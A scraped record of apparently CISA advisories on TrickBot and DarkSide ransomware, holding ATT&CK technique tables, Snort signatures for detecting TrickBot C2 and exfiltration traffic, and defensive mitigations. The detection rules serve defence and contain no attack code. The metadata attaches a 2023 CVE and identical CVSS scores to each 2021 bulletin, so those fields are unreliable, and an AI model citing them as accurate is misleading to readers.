webpage. \n \n_Command and Control_ [[TA0011](<https://attack.mitre.org/versions/v8/tactics/TA0011/>)]\n\n**Technique Tactic ** | **ID** | **Use** \n---|---|--- \nFallback Channels | [T1008](<https://attack.mitre.org/versions/v8/techniques/T1008>) | TrickBot can use secondary command and control (C2) servers for communication after establishing connectivity and relaying victim information to primary C2 servers. \nApplication Layer Protocol: Web Protocols | [T1071.001](<https://attack.mitre.org/versions/v8/techniques/T1071/001>) | TrickBot uses HTTPS to communicate with its C2 servers, to get malware updates, modules that perform most of the malware logic and various configuration files. \nIngress Tool Transfer | [T1105](<https://attack.mitre.org/versions/v8/techniques/T1105>) | TrickBot downloads several additional files and saves them to the victim's machine. \nData Encoding: Standard Encoding | [T1132.001](<https://attack.mitre.org/versions/v8/techniques/T1132/001>) | TrickBot can Base64-encode C2 commands. \nNon-Standard Port | [T1571](<https://attack.mitre.org/versions/v8/techniques/T1571>) | Some TrickBot samples have used HTTP over ports 447 and 8082 for C2. \nEncrypted Channel: Symmetric Cryptography | [T1573.001](<https://attack.mitre.org/versions/v8/techniques/T1573/001>) | TrickBot uses a custom crypter leveraging Microsoft\u2019s CryptoAPI to encrypt C2 traffic. \n \n_Exfiltration_ [[TA0010](<https://attack.mitre.org/versions/v8/tactics/TA0010/>)]\n\n**Technique Tactic** | **ID** | **Use** \n---|---|--- \nExfiltration Over C2 Channel | [T1041](<https://attack.mitre.org/versions/v8/techniques/T1041>) | TrickBot can send information about the compromised host to a hardcoded C2 server. \n \n_Impact_ [[TA0040](<https://attack.mitre.org/versions/v8/tactics/TA0040/>)]\n\n**Technique Tactic** | **ID** | **Use** \n---|---|--- \nResource Hijacking | [T1496](<https://attack.mitre.org/versions/v8/techniques/T1496>) | TrickBot actors can leverage the resources of co-opted systems for cryptomining to validate transactions of cryptocurrency networks and earn virtual currency. \n \n### Detection\n\n#### Signatures\n\nCISA developed the following snort signature for use in detecting network activity associated with TrickBot activity.\n\nalert tcp any [443,447] -> any any (msg:\"TRICKBOT:SSL/TLS Server X.509 Cert Field contains 'example.com' (Hex)\"; sid:1; rev:1; flow:established,from_server; ssl_state:server_hello; content:\"|0b|example.com\"; fast_pattern:only; content:\"Global Security\"; content:\"IT Department\"; pcre:\"/(?:\\x09\\x00\\xc0\\xb9\\x3b\\x93\\x72\\xa3\\xf6\\xd2|\\x00\\xe2\\x08\\xff\\xfb\\x7b\\x53\\x76\\x3d)/\"; classtype:bad-unknown; metadata:service ssl,service and-ports;)\n\nalert tcp any any -> any $HTTP_PORTS (msg:\"TRICKBOT_ANCHOR:HTTP URI GET contains '/anchor'\"; sid:1; rev:1; flow:established,to_server; content:\"/anchor\"; http_uri; fast_pattern:only; content:\"GET\"; nocase; http_method; pcre:\"/^\\/anchor_?.{3}\\/[\\w_-]+\\\\.[A-F0-9]+\\/?$/U\"; classtype:bad-unknown; priority:1; metadata:service http;)\n\nalert tcp any $SSL_PORTS -> any any (msg:\"TRICKBOT:SSL/TLS Server X.509 Cert Field contains 'C=XX, L=Default City, O=Default Company Ltd'\"; sid:1; rev:1; flow:established,from_server; ssl_state:server_hello; content:\"|31 0b 30 09 06 03 55 04 06 13 02|XX\"; nocase; content:\"|31 15 30 13 06 03 55 04 07 13 0c|Default City\"; nocase; content:\"|31 1c 30 1a 06 03 55 04 0a 13 13|Default Company Ltd\"; nocase; content:!\"|31 0c 30 0a 06 03 55 04 03|\"; classtype:bad-unknown; reference:url,www.virustotal.com/gui/file/e9600404ecc42cf86d38deedef94068db39b7a0fd06b3b8fb2d8a3c7002b650e/detection; metadata:service ssl;)\n\nalert tcp any any -> any $HTTP_PORTS (msg:\"TRICKBOT:HTTP Client Header contains 'boundary=Arasfjasu7'\"; sid:1; rev:1; flow:established,to_server; content:\"boundary=Arasfjasu7|0d 0a|\"; http_header; content:\"name=|22|proclist|22|\"; http_header; content:!\"Referer\"; content:!\"Accept\"; content:\"POST\"; http_method; classtype:bad-unknown; metadata:service http;)\n\nalert tcp any any -> any $HTTP_PORTS (msg:\"TRICKBOT:HTTP Client Header contains 'User-Agent|3a 20|WinHTTP loader/1.'\"; sid:1; rev:1; flow:established,to_server; content:\"User-Agent|3a 20|WinHTTP loader/1.\"; http_header; fast_pattern:only; content:\".png|20|HTTP/1.\"; pcre:\"/^Host\\x3a\\x20(?:\\d{1,3}\\\\.){3}\\d{1,3}(?:\\x3a\\d{2,5})?$/mH\"; content:!\"Accept\"; http_header; content:!\"Referer|3a 20|\"; http_header; classtype:bad-unknown; metadata:service http;)\n\nalert tcp any $HTTP_PORTS -> any any (msg:\"TRICKBOT:HTTP Server Header contains 'Server|3a 20|Cowboy'\"; sid:1; rev:1; flow:established,from_server; content:\"200\"; http_stat_code; content:\"Server|3a 20|Cowboy|0d 0a|\"; http_header; fast_pattern; content:\"content-length|3a 20|3|0d 0a|\"; http_header; file_data; content:\"/1/\"; depth:3; isdataat:!1,relative; classtype:bad-unknown; metadata:service http;)\n\nalert tcp any any -> any $HTTP_PORTS (msg:\"TRICKBOT:HTTP URI POST contains C2 Exfil\"; sid:1; rev:1; flow:established,to_server; content:\"Content-Type|3a 20|multipart/form-data|3b 20|boundary=------Boundary\"; http_header; fast_pattern; content:\"User-Agent|3a 20|\"; http_header; distance:0; content:\"Content-Length|3a 20|\"; http_header; distance:0; content:\"POST\"; http_method; pcre:\"/^\\/[a-z]{3}\\d{3}\\/.+?\\\\.[A-F0-9]{32}\\/\\d{1,3}\\//U\"; pcre:\"/^Host\\x3a\\x20(?:\\d{1,3}\\\\.){3}\\d{1,3}$/mH\"; content:!\"Referer|3a|\"; http_header; classtype:bad-unknown; metadata:service http;)\n\nalert tcp any any -> any $HTTP_PORTS (msg:\"HTTP URI GET/POST contains '/56evcxv' (Trickbot)\"; sid:1; rev:1; flow:established,to_server; content:\"/56evcxv\"; http_uri; fast_pattern:only; classtype:bad-unknown; metadata:service http;)\n\nalert icmp any any -> any any (msg:\"TRICKBOT_ICMP_ANCHOR:ICMP traffic conatins 'hanc'\"; sid:1; rev:1; itype:8; content:\"hanc\"; offset:4; fast_pattern; classtype:bad-unknown;)\n\nalert tcp any any -> any $HTTP_PORTS (msg:\"HTTP Client Header contains POST with 'host|3a 20|*.onion.link' and 'data=' (Trickbot/Princess Ransomeware)\"; sid:1; rev:1; flow:established,to_server; content:\"POST\"; nocase; http_method; content:\"host|3a 20|\"; http_header; content:\".onion.link\"; nocase; http_header; distance:0; within:47; fast_pattern; file_data; content:\"data=\"; distance:0; within:5; classtype:bad-unknown; metadata:service http;)\n\nalert tcp any any -> any $HTTP_PORTS (msg:\"HTTP Client Header contains 'host|3a 20|tpsci.com' (trickbot)\"; sid:1; rev:1; flow:established,to_server; content:\"host|3a 20|tpsci.com\"; http_header; fast_pattern:only; classtype:bad-unknown; metadata:service http;)\n\n### Mitigations\n\nCISA and FBI recommend that network defenders\u2014in federal, state, local, tribal, territorial governments, and the private sector\u2014consider applying the following best practices to strengthen the security posture of their organization's systems. System owners and administrators should review any configuration changes prior to implementation to avoid negative impacts.\n\n * Provide social engineering and phishing training to employees.\n * Consider drafting or updating a policy addressing suspicious emails that specifies users must report all suspicious emails to the security and/or IT departments.\n * Mark external emails with a banner denoting the email is from an external source to assist users in detecting spoofed emails.\n * Implement Group Policy Object and firewall rules.\n * Implement an antivirus program and a formalized patch management process.\n * Implement filters at the email gateway and block suspicious IP addresses at the firewall.\n * Adhere to the principle of least privilege.\n * Implement a Domain-Based Message Authentication, Reporting & Conformance validation system.\n * Segment and segregate networks and functions.\n * Limit unnecessary lateral communications between network hoses, segments, and devices.\n * Consider using application allowlisting technology on all assets to ensure that only authorized software executes, and all unauthorized software is blocked from executing on assets. Ensure that such technology only allows authorized, digitally signed scripts to run on a system.\n * Enforce multi-factor authentication.\n * Enable a firewall on agency workstations configured to deny unsolicited connection requests.\n * Disable unnecessary services on agency workstations and servers.\n * Implement an Intrusion Detection System, if not already used, to detect C2 activity and other potentially malicious network activity\n * Monitor web traffic. Restrict user access to suspicious or risky sites.\n * Maintain situational awareness of the latest threats and implement appropriate access control lists.\n * Disable the use of SMBv1 across the network and require at least SMBv2 to harden systems against network propagation modules used by TrickBot.\n * Visit the MITRE ATT&CK Techniques pages (linked in table 1 above) for additional mitigation and detection strategies.\n * See CISA\u2019s Alert on [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>) for more information on addressing potential incidents and applying best practice incident response procedures.\n\nFor additional information on malware incident prevention and handling, see the National Institute of Standards and Technology Special Publication 800-83, [Guide to Malware Incident Prevention and Handling for Desktops and Laptops](<https://csrc.nist.gov/publications/detail/sp/800-83/rev-1/final>).\n\n### Resources\n\n * CISA Fact Sheet: TrickBot Malware\n * [MS-ISAC White Paper: Security Primer \u2013 TrickBot](<https://www.cisecurity.org/white-papers/security-primer-trickbot/>)\n * [United Kingdom National Cyber Security Centre Advisory: Ryuk Ransomware Targeting Organisations Globally](<https://www.ncsc.gov.uk/news/ryuk-advisory>)\n * [CISA and MS-ISAC Joint Alert AA20-280A: Emotet Malware](<https://us-cert.cisa.gov/ncas/alerts/aa20-280a>)\n * [MITRE ATT&CK for Enterprise](<https://attack.mitre.org/matrices/enterprise/>)\n\n### References\n\n[[1] FireEye Blog - A Nasty Trick: From Credential Theft Malware to Business Disruption](<https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html>)\n\n[[2] Eclypsium Blog - TrickBot Now Offers 'TrickBoot': Persist, Brick, Profit](<https://eclypsium.com/2020/12/03/trickbot-now-offers-trickboot-persist-brick-profit/#background>)\n\n### Revisions\n\nMarch 17, 2021: Initial Version|March 24, 2021: Added MITRE ATT&CK Technique T1592.003 used for reconnaissance|May 20, 2021: Added new MITRE ATT&CKs and updated Table 1\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-20T12:00:00", "type": "ics", "title": "TrickBot Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-27350"], "modified": "2021-05-20T12:00:00", "id": "AA21-076A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-076a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-31T15:27:28", "description": "### Summary\n\nSee Technical Details section\n\n### Technical Details\n\nTable 1 provides a summary of the MITRE ATT&CK techniques observed.\n\n_Table 1: MITRE ATT&CK techniques observed_\n\nTechnique Title\n\n| Technique ID \n---|--- \n \nProcess Injection: Dynamic-link Library Injection\n\n| \n\n[T1055.001](<https://attack.mitre.org/versions/v9/techniques/T1055/001/>) \n \n_Ingress Tool Transfer_\n\n| \n\n[T1105](<https://attack.mitre.org/versions/v9/techniques/T1105/>) \n \nUser Execution: Malicious Link\n\n| \n\n[T1204.001](<https://attack.mitre.org/versions/v9/techniques/T1204/001/>) \n \n_Phishing: Spearphishing Link_\n\n| \n\n[T1566.002](<https://attack.mitre.org/versions/v9/techniques/T1566/002/>) \n \n### Revisions\n\nMay 28, 2021\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-28T12:00:00", "type": "ics", "title": "ATT&CK Table for Sophisticated Spearphishing Campaign CSA", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-27350"], "modified": "2021-05-28T12:00:00", "id": "AA21-0000A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-0000a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-31T15:27:47", "description": "### Summary\n\n_This Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework, Version 9. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v8/techniques/enterprise/>) for all referenced threat actor tactics and techniques._\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) are aware of a ransomware attack affecting a critical infrastructure (CI) entity\u2014a pipeline company\u2014in the United States. Malicious cyber actors deployed DarkSide ransomware against the pipeline company\u2019s information technology (IT) network.[[1](<https://www.colpipe.com/news/press-releases/media-statement-colonial-pipeline-system-disruption>)] At this time, there is no indication that the entity\u2019s operational technology (OT) networks have been directly affected by the ransomware.\n\nCISA and FBI urge CI asset owners and operators to adopt a heightened state of awareness and implement the recommendations listed in the Mitigations section of this Joint Cybersecurity Advisory, including implementing robust network segmentation between IT and OT networks; regularly testing manual controls; and ensuring that backups are implemented, regularly tested, and isolated from network connections. These mitigations will help CI owners and operators improve their entity's functional resilience by reducing their vulnerability to ransomware and the risk of severe business degradation if impacted by ransomware.\n\n * **(Updated May 19, 2021):** Click here for a STIX package of indicators of compromise (IOCs). **Note:** These IOCs were shared with critical infrastructure partners and network defenders on May 10, 2021. The applications listed in the IOCs were leveraged by the threat actors during the course of a compromise. Some of these applications might appear within an organization's enterprise to support legitimate purposes; however, these applications can be used by threat actors to aid in malicious exploitation of an organization's enterprise. CISA and FBI recommend removing any application not deemed necessary for day-to-day operations.\n * **(Updated July 08, 2021)**: Click here for downloadable IOCs associated with a sample of a DarkSide ransomware variant analyzed by CISA and FBI. Note: CISA and FBI have no evidence that this sample is related to the pipeline incident detailed in this CSA. This variant executes a dynamic-link library (DLL) program used to delete Volume Shadow copies available on the system. The malware collects, encrypts, and sends system information to the threat actor\u2019s command and control (C2) domains and generates a ransom note to the victim. For more information about this variant, refer to Malware Analysis Report [MAR-10337802-1.v1: DarkSide Ransomware](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-189a>). \n\nClick here for a PDF version of this report.\n\n### Technical Details\n\n_**Note**: the analysis in this Joint Cybersecurity Advisory is ongoing, and the information provided should not be considered comprehensive. CISA and FBI will update this advisory as new information is available._\n\nAfter gaining initial access to the pipeline company\u2019s network, DarkSide actors deployed DarkSide ransomware against the company\u2019s IT network. In response to the cyberattack, the company has reported that they proactively disconnected certain OT systems to ensure the systems\u2019 safety.[[2](<https://www.colpipe.com/news/press-releases/media-statement-colonial-pipeline-system-disruption>)] At this time, there are no indications that the threat actor moved laterally to OT systems.\n\nDarkSide is ransomware-as-a-service (RaaS)\u2014the developers of the ransomware receive a share of the proceeds from the cybercriminal actors who deploy it, known as \u201caffiliates.\u201d According to open-source reporting, since August 2020, DarkSide actors have been targeting multiple large, high-revenue organizations, resulting in the encryption and theft of sensitive data. The DarkSide group has publicly stated that they prefer to target organizations that can afford to pay large ransoms instead of hospitals, schools, non-profits, and governments.[[3](<https://securitynews.sonicwall.com/xmlpost/darkside-ransomware-targets-large-corporations-charges-up-to-2m/>)],[[4](<https://www.varonis.com/blog/darkside-ransomware/>)]\n\nAccording to open-source reporting, DarkSide actors have previously been observed gaining initial access through phishing and exploiting remotely accessible accounts and systems and Virtual Desktop Infrastructure (VDI) (_Phishing _[[T1566]](<https://attack.mitre.org/versions/v9/techniques/T1566/>), _Exploit Public-Facing Application_ [[T1190](<https://attack.mitre.org/versions/v9/techniques/T1190/>)], _External Remote Services_ [[T1133](<https://attack.mitre.org/versions/v9/techniques/T1133/>)]).[[5](<https://www.bankinfosecurity.com/fbi-darkside-ransomware-used-in-colonial-pipeline-attack-a-16555>)],[[6](<https://www.varonis.com/blog/darkside-ransomware/>)] DarkSide actors have also been observed using Remote Desktop Protocol (RDP) to maintain _Persistence_ [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003/>)].[[7](<https://www.varonis.com/blog/darkside-ransomware/>)]\n\nAfter gaining access, DarkSide actors deploy DarkSide ransomware to encrypt and steal sensitive data (_Data Encrypted for Impact_ [[T1486](<https://attack.mitre.org/techniques/T1486/>)]). The actors then threaten to publicly release the data if the ransom is not paid.[[8](<https://securitynews.sonicwall.com/xmlpost/darkside-ransomware-targets-large-corporations-charges-up-to-2m/>)],[[9](<https://www.varonis.com/blog/darkside-ransomware/>)] The DarkSide ransomware uses Salsa20 and RSA encryption.[[10](<https://www.mcafee.com/enterprise/en-us/threat-center/threat-landscape-dashboard/ransomware-details.darkside-ransomware.html>)]\n\nDarkSide actors primarily use [The Onion Router (TOR)](<https://attack.mitre.org/software/S0183/>) for _Command and Control (C2)_ [[TA0011](<https://attack.mitre.org/versions/v9/tactics/TA0011/>)] (_Proxy: Multi-hop Proxy_ [[1090.003](<https://attack.mitre.org/versions/v9/techniques/T1090/003/>)]).[[11](<https://securitynews.sonicwall.com/xmlpost/darkside-ransomware-targets-large-corporations-charges-up-to-2m/>)],[[12](<https://www.varonis.com/blog/darkside-ransomware/>)] The actors have also been observed using [Cobalt Strike](<https://attack.mitre.org/versions/v9/software/S0154/>) for C2.[[13](<https://www.mcafee.com/enterprise/en-us/threat-center/threat-landscape-dashboard/ransomware-details.darkside-ransomware.html>)]\n\n### Mitigations\n\nCISA and FBI urge CI owners and operators to apply the following mitigations to reduce the risk of compromise by ransomware attacks.\n\n * **Require multi-factor authentication** for remote access to OT and IT networks.\n * **Enable strong spam filters to prevent phishing emails from reaching end users**. Filter emails containing executable files from reaching end users.\n * **Implement a user training program and simulated attacks for spearphishing** to discourage users from visiting malicious websites or opening malicious attachments and re-enforce the appropriate user responses to spearphishing emails.\n * **Filter network traffic **to prohibit ingress and egress communications with known malicious IP addresses. Prevent users from accessing malicious websites by implementing URL blocklists and/or allowlists.\n * **Update software**, including operating systems, applications, and firmware on IT network assets, in a timely manner. Consider using a centralized patch management system; use a risk-based assessment strategy to determine which OT network assets and zones should participate in the patch management program.\n * **Limit access to resources over networks, especially by restricting RDP**. After assessing risks, if RDP is deemed operationally necessary, restrict the originating sources and require multi-factor authentication.\n * **Set antivirus/antimalware programs to conduct regular scans** of IT network assets using up-to-date signatures. Use a risk-based asset inventory strategy to determine how OT network assets are identified and evaluated for the presence of malware.\n * **Implement unauthorized execution prevention by**: \n * **Disabling macro scripts from Microsoft Office files** transmitted via email. Consider using Office Viewer software to open Microsoft Office files transmitted via email instead of full Microsoft Office suite applications.\n * **Implementing application allowlisting**, which only allows systems to execute programs known and permitted by security policy. Implement software restriction policies (SRPs) or other controls to prevent programs from executing from common ransomware locations, such as temporary folders supporting popular internet browsers or compression/decompression programs, including the `AppData/LocalAppData` folder.\n * **Monitor and/or block inbound connections from Tor exit nodes and other anonymization services** to IP addresses and ports for which external connections are not expected (i.e., other than VPN gateways, mail ports, web ports). For more guidance, refer to Joint Cybersecurity Advisory [AA20-183A: Defending Against Malicious Cyber Activity Originating from Tor](<https://us-cert.cisa.gov/ncas/alerts/aa20-183a>).\n * **Deploy signatures to detect and/or block inbound connection from Cobalt Strike servers** and other post exploitation tools.\n\nCISA and FBI urge CI owners and operators to apply the following mitigations now to reduce the risk of severe business or functional degradation should their CI entity fall victim to a ransomware attack in the future.\n\n * **Implement and ensure robust network segmentation between IT and OT networks **to limit the ability of adversaries to pivot to the OT network even if the IT network is compromised. Define a demilitarized zone that eliminates unregulated communication between the IT and OT networks.\n * **Organize OT assets into logical zones** by taking into account criticality, consequence, and operational necessity. Define acceptable communication conduits between the zones and deploy security controls to filter network traffic and monitor communications between zones. Prohibit industrial control system (ICS) protocols from traversing the IT network.\n * **Identify OT and IT network inter-dependencies and develop workarounds or manual controls** to ensure ICS networks can be isolated if the connections create risk to the safe and reliable operation of OT processes. Regularly test contingency plans such as manual controls so that safety critical functions can be maintained during a cyber incident. Ensure that the OT network can operate at necessary capacity even if the IT network is compromised. \n * **Regularly test manual controls** so that critical functions can be kept running if ICS or OT networks need to be taken offline.\n * **Implement regular data backup procedures** on both the IT and OT networks. Backup procedures should be conducted on a frequent, regular basis. The data backup procedures should also address the following best practices: \n * **Ensure that backups are regularly tested**.\n * **Store your backups separately**. Backups should be isolated from network connections that could enable the spread of ransomware. It is important that backups be maintained offline as many ransomware variants attempt to find and encrypt or delete accessible backups. Maintaining current backups offline is critical because if your network data is encrypted with ransomware, your organization can restore systems to its previous state. Best practice is to store your backups on a separate device that cannot be accessed from a network, such as on an external hard drive. (See the Software Engineering Institute\u2019s page on [ransomware](<https://insights.sei.cmu.edu/sei_blog/2017/05/ransomware-best-practices-for-prevention-and-response.html>)).\n * **Maintain regularly updated \u201cgold images\u201d of critical systems in the event they need to be rebuilt**. This entails maintaining image \u201ctemplates\u201d that include a preconfigured operating system (OS) and associated software applications that can be quickly deployed to rebuild a system, such as a virtual machine or server.\n * **Retain backup hardware** to rebuild systems in the event rebuilding the primary system is not preferred. Hardware that is newer or older than the primary system can present installation or compatibility hurdles when rebuilding from images.\n * **Store source code or executables**. It is more efficient to rebuild from system images, but some images will not install on different hardware or platforms correctly; having separate access to needed software will help in these cases.\n * **Ensure user and process accounts are limited through account use policies, user account control, and privileged account management**. Organize access rights based on the principles of least privilege and separation of duties.\n\nIf your organization is impacted by a ransomware incident, CISA and FBI recommend the following actions:\n\n * **Isolate the infected system**. Remove the infected system from all networks, and disable the computer\u2019s wireless, Bluetooth, and any other potential networking capabilities. Ensure all shared and networked drives are disconnected, whether wired or wireless. \n * **Turn off other computers and devices**. Power-off and segregate (i.e., remove from the network) the infected computer(s). Power-off and segregate any other computers or devices that shared a network with the infected computer(s) that have not been fully encrypted by ransomware. If possible, collect and secure all infected and potentially infected computers and devices in a central location, making sure to clearly label any computers that have been encrypted. Powering-off and segregating infected computers and computers that have not been fully encrypted may allow for the recovery of partially encrypted files by specialists. (See [Before You Connect a New Computer to the Internet](<https://us-cert.cisa.gov/ncas/tips/ST15-003>) for tips on how to make a computer more secure before you reconnect it to a network.)\n * **Secure your backups**. Ensure that your backup data is offline and secure. If possible, scan your backup data with an antivirus program to check that it is free of malware.\n * Refer to Joint Cybersecurity Advisory: [AA20-245A: Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>) for more best practices on incident response.\n\n**Note: **CISA and the FBI do not encourage paying a ransom to criminal actors. Paying a ransom may embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or may fund illicit activities. Paying the ransom also does not guarantee that a victim\u2019s files will be recovered. CISA and FBI urge you to report ransomware incidents to your [local FBI field office](<http://www.fbi.gov/contact-us/field>).\n\nCISA offers a range of no-cost [cyber hygiene services](<https://www.cisa.gov/cyber-hygiene-services>) to help CI organizations assess, identify and reduce their exposure to threats, including ransomware. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate attack vectors.\n\n### Resources\n\n * CISA and MS-ISAC: [Joint Ransomware Guide](<https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware Guide_S508C.pdf>)\n * CISA: [Ransomware page](<https://www.cisa.gov/ransomware>)\n * CISA Tip: [Protecting Against Ransomware](<https://us-cert.cisa.gov/ncas/tips/ST19-001>)\n * CISA: [CISA Ransomware One-Pager and Technical Document](<https://www.us-cert.gov/sites/default/files/publications/Ransomware_Executive_One-Pager_and_Technical_Document-FINAL.pdf>)\n * CISA Insights: [Ransomware Outbreak](<https://www.us-cert.gov/sites/default/files/2019-08/CISA_Insights-Ransomware_Outbreak_S508C.pdf>)\n * CISA: [Pipeline Cybersecurity Initiative](<https://www.cisa.gov/pipeline-cybersecurity-initiative>)\n * CISA Webinar: [Combating Ransomware](<https://www.youtube.com/watch?v=D8kC07tu27A>)\n * CISA: [Cybersecurity Practices for Industrial Control Systems](<https://www.cisa.gov/publication/cybersecurity-best-practices-for-industrial-control-systems>)\n * FBI: [Incidents of Ransomware on the Rise](<https://www.fbi.gov/news/stories/incidents-of-ransomware-on-the-rise/incidents-of-ransomware-on-the-rise>)\n * National Security Agency (NSA): [Stop Malicious Cyber Activity Against Connected Operational Technology](<https://media.defense.gov/2021/Apr/29/2002630479/-1/-1/1/CSA_STOP-MCA-AGAINST-OT_UOO13672321.PDF>)\n * Department of Energy: [Oil and Natural Gas Subsector Cybersecurity Capability Maturity Model](<https://www.energy.gov/sites/prod/files/2014/03/f13/ONG-C2M2-v1-1_cor.pdf>)\n * Transportation Security Agency: [Pipeline Security Guidelines](<https://www.tsa.gov/sites/default/files/pipeline_security_guidelines.pdf>)\n * National Institute of Standards and Technology (NIST): [Framework for Improving Critical Infrastructure Cybersecurity](<https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf>)\n * NIST: [Ransomware Protection and Response](<https://csrc.nist.gov/projects/ransomware-protection-and-response>)\n * NIST: [Data Integrity: Identifying and Protecting Assets Against Ransomware and Other Destructive Events](<https://www.nccoe.nist.gov/projects/building-blocks/data-integrity/identify-protect>)\n * NIST: [Data Integrity: Detecting and Responding to Ransomware and Other Destructive Events](<https://www.nccoe.nist.gov/projects/building-blocks/data-integrity/detect-respond>)\n * NIST: [Data Integrity: Recovering from Ransomware and Other Destructive Events](<https://www.nccoe.nist.gov/projects/building-blocks/data-integrity/recover>)\n * NIST: [Guide to Industrial Control Systems (ICS) Security](<https://csrc.nist.gov/publications/detail/sp/800-82/rev-2/final>)\n * Software Engineering Institute: Ransomware: [Best Practices for Prevention and Response](<https://insights.sei.cmu.edu/blog/ransomware-best-practices-for-prevention-and-response/>)\n * NIST [Fact Sheet: How Do I Stay Prepared?](<https://csrc.nist.gov/CSRC/media/Projects/ransomware-protection-and-response/documents/NIST_Tips_for_Preparing_for_Ransomware_Attacks.pdf>)\n\n### Contact Information\n\nVictims of ransomware should report it immediately to CISA at <https://us-cert.cisa.gov/report>, a [local FBI Field Office](<https://www.fbi.gov/contact-us/field-offices>), or [U.S. Secret Service Field Office](<http://www.secretservice.gov/contact/field-offices/>). To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<http://www.fbi.gov/contact-us/field>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [CISAServiceDesk@cisa.dhs.gov](<mailto:CISAServiceDesk@cisa.dhs.gov>).\n\n### References\n\n[[1] Colonial Pipeline Media Statement on Pipeline Disruption](<https://www.colpipe.com/news/press-releases/media-statement-colonial-pipeline-system-disruption>)\n\n[[2] Ibid](<https://www.colpipe.com/news/press-releases/media-statement-colonial-pipeline-system-disruption>)\n\n[[3] SonicWall: Darkside Ransomware Targets Large Corporations. Charges up to $2M.](<https://securitynews.sonicwall.com/xmlpost/darkside-ransomware-targets-large-corporations-charges-up-to-2m/>)\n\n[[4] Varonis: Return of the Darkside: Analysis of a Large-Scale Data Theft Campaign](<https://www.varonis.com/blog/darkside-ransomware/>)\n\n[[5] BankInfo Security: FBI: DarkSide Ransomware Used in Colonial Pipeline Attack](<https://www.bankinfosecurity.com/fbi-darkside-ransomware-used-in-colonial-pipeline-attack-a-16555>)\n\n[[6] Varonis: Return of the Darkside: Analysis of a Large-Scale Data Theft Campaign](<https://www.varonis.com/blog/darkside-ransomware/>)\n\n[[7] Ibid](<https://www.varonis.com/blog/darkside-ransomware/>)\n\n[[8] SonicWall: Darkside Ransomware Targets Large Corporations. Charges up to $2M](<https://securitynews.sonicwall.com/xmlpost/darkside-ransomware-targets-large-corporations-charges-up-to-2m/>)\n\n[[9] Varonis: Return of the Darkside: Analysis of a Large-Scale Data Theft Campaign](<https://www.varonis.com/blog/darkside-ransomware/>)\n\n[[10] McAfee: Threat Landscape Dashboard DarkSide \u2013 Ransomware](<https://www.mcafee.com/enterprise/en-us/threat-center/threat-landscape-dashboard/ransomware-details.darkside-ransomware.html>)\n\n[[11] SonicWall: Darkside Ransomware Targets Large Corporations. Charges up to $2M](<https://securitynews.sonicwall.com/xmlpost/darkside-ransomware-targets-large-corporations-charges-up-to-2m/>)\n\n[[12] Varonis: Return of the Darkside: Analysis of a Large-Scale Data Theft 